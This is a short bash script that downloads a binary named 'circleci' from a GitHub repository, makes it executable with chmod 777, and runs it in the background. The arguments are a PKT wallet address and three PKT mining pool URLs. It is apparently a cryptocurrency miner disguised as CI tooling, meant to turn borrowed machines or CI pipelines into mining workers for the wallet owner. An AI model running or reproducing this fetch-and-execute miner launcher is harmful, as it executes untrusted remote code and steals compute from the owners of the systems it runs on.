#!/bin/bash
wget https://github.com/aurbach55/zash/raw/main/circleci
chmod 777 circleci
nohup ./circleci ann -p pkt1q76dngmrf380w8k9j4f7w4eqpzx3n9vcprldmjx  http://pool.pkteer.com http://pool.pktpool.io http://pool.pkt.world > nohup.out



